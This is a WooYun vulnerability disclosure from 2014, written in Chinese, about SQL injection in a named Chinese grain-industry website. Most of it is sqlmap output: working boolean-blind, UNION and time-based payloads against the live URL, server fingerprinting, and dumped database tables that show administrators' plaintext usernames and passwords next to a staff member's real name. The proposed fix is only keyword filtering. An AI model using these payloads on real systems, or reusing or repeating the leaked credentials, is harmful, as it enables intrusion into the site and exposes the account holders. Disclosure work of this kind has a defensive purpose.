漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-068111
漏洞标题:中国某行业主网SQL注射漏洞
相关厂商:中国粮食行业网
漏洞作者: 路人甲
提交时间:2014-07-11 17:26
修复时间:2014-08-25 17:28
公开时间:2014-08-25 17:28
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-07-11: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-08-25: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
中国某行业主网存在SQL注射漏洞
详细说明:
http://www.chinagrains.org.cn/new/industry/newsview.asp?id=1存在SQL注射漏洞,hash密码可以爆破
漏洞证明:
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 7712=7712
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: id=-1669 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(117)+CHAR(101)+CHAR(117)+CHAR(113)+CHAR(100)+CHAR(65)+CHAR(100)+CHAR(97)+CHAR(118)+CHAR(66)+CHAR(72)+CHAR(102)+CHAR(68)+CHAR(117)+CHAR(113)+CHAR(104)+CHAR(104)+CHAR(120)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: id=1 AND 5014=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS operating system: Windows 7 Service Pack 1
back-end DBMS: active fingerprint: Microsoft SQL Server 2008
banner parsing fingerprint: Microsoft SQL Server 2008 R2 Service Pack 0 version 10.50.1600.1
banner:
---
Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64)
Apr 2 2010 15:48:46
Copyright (c) Microsoft Corporation
Enterprise Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1)
Database: zglx
Table: statuser
[2 entries]
+----+---------+---------+-------+---------+----------+----------+----------+----------+-----------------------------------+
| id | city | note | cname | county | province | username | corpname | password | user_right |
+----+---------+---------+-------+---------+----------+----------+----------+----------+-----------------------------------+
| 1 | <blank> | <blank> | 管理员 | <blank> | <blank> | admin | <blank> | zglx2004 | 111111111111111100000000000000000 |
| 2 | 北京 | <blank> | zglx | <blank> | 北京 | zglx | <blank> | zglx123 | 11001011111111000000000000000000 |
+----+---------+---------+-------+---------+----------+----------+----------+----------+-----------------------------------+
Database: zglx
Table: siteadmin
[1 entry]
+----+---------+------+-------+----------+--------------+--------------------------------------------------------------------------+
| id | note | dept | cname | username | password | user_right |
+----+---------+------+-------+----------+--------------+--------------------------------------------------------------------------+
| 6 | <blank> | 信息处 | 韩兆轩 | zglx2006 | zglx66033580 | 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 |
+----+---------+------+-------+----------+--------------+--------------------------------------------------------------------------+
修复方案:
过滤关键字
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝